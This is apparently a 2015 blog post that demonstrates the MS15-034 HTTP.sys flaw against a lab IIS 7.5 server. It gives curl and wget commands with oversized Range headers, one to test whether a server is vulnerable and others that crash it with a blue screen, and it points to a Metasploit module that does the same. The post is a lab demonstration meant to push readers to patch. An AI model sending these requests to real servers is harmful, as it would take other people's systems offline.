Tuesday 21 April 2015

Little Demonstration of MS15-034

MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service can be a big headache for IIS Developers, simple commands may crash the OS. Denial of Service (DoS) exploits are widely available to exploit CVE-2015-1635, a vulnerability in HTTP.sys, affecting Internet Information Server (IIS) . The patch was released on Tuesday (April 14th) as part of Microsoft's Patch Tuesday.

ref: https://isc.sans.edu/forums/diary/MS15034+HTTPsys+IIS+DoS+And+Possible+Remote+Code+Execution+PATCH+NOW/19583/

Here is a simple demonstration

Attacker: Kali Linux


Victim: Windows 2008 Server R2, IIS 7.5 (192.168.182.154)





1. Using a curl command to test if the server is vulnerable:
curl -v 192.168.182.154/ -H "Host: test" -H "Range: bytes=0-18446744073709551615"
If it returns "Requested Header Range Not Satisfiable", the server may be vulnerable.




2. If the server seems to be vulnerable, changing the Range to be "Range:bytes=18-18446744073709551615" can cause DOS / BSOD of the server. Let's try a simple wget command, request an existing resource "welcome.png"

for curl, removing the quotes of the Range header, it will also work: (probably just freezing the system but not BSOD)
curl -v "192.168.182.154/welcome.png"  -H Range:bytes=18-18446744073709551615 



Command: wget --header="Range: bytes=18-18446744073709551615" http://192.168.182.154/welcome.png


On the other hand, our victim crashed with BSOD :-(....


After reboot, it gives another BSOD. (but sometimes it didn't give BSOD when reboot)
edited: Another BSOD most likely because the wget request keeps trying, so once the system is booted up, it accepts the requests and crashed again. Thanks for my friend's explanation.


3. Using Metasploit's module can also achieve the DOS.
ref: http://www.rapid7.com/db/modules/auxiliary/dos/http/ms15_034_ulonglongadd


As soon as the module is executed, the server is down...(not fast enough to capture at the first shot, so there're two trials :)...)



From the above demonstration, we can see how easily the server can be brought down, time to review and harden the IIS servers my friends~

2 comments: